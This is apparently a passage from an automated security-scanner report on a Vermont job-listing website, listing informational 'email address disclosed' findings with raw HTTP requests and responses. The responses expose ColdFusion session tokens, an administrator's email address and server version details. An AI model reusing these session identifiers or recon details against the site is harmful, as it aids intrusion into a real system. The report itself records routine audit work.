Date: Fri, 29 Apr 2011 21:06:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT
Content-Type: text/css


html { height: 100%; margin-bottom: 1px; }
body {margin: 0pt; padding: 0px; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; background-color: #587993;}

.step1size {font-
...[SNIP]...

22.241. https://www.vermontjoblink.com/ada/leavesite.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/leavesite.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/leavesite.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.242. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_eligibility_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_eligibility_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.243. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_forgotpass.cfm HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:07:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.244. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_login_fnc.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_login_fnc.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:14:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
location: /ada
Content-Type: text/html; charset=UTF-8

<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->

22.245. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_offices_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_offices_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:58 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.246. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_protectyourself_dsp.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:14:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</a>, such as yourfullname.joblink@gmail.com, for each website where you post a resume. You can have emails from the new account forwarded to your real personal email address. If you start getting bogus job offers, you can determine from whic
...[SNIP]...

22.247. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_quicksearch_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.248. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_registration_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
location: mn_empagreement_dsp.cfm
Expires: 06 Nov 1994 08:49:37 GMT
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
<!-- Caching is Off -->

22.249. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_settings_dsp.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_settings_dsp.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:54 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...

22.250. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_ssncheck.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /ada/mn_ssncheck.cfm HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:11:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
